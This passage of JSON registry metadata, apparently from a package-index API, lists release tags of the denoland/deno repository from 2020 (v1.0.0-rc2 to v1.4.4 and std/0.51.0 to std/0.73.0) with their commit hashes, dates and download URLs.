.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0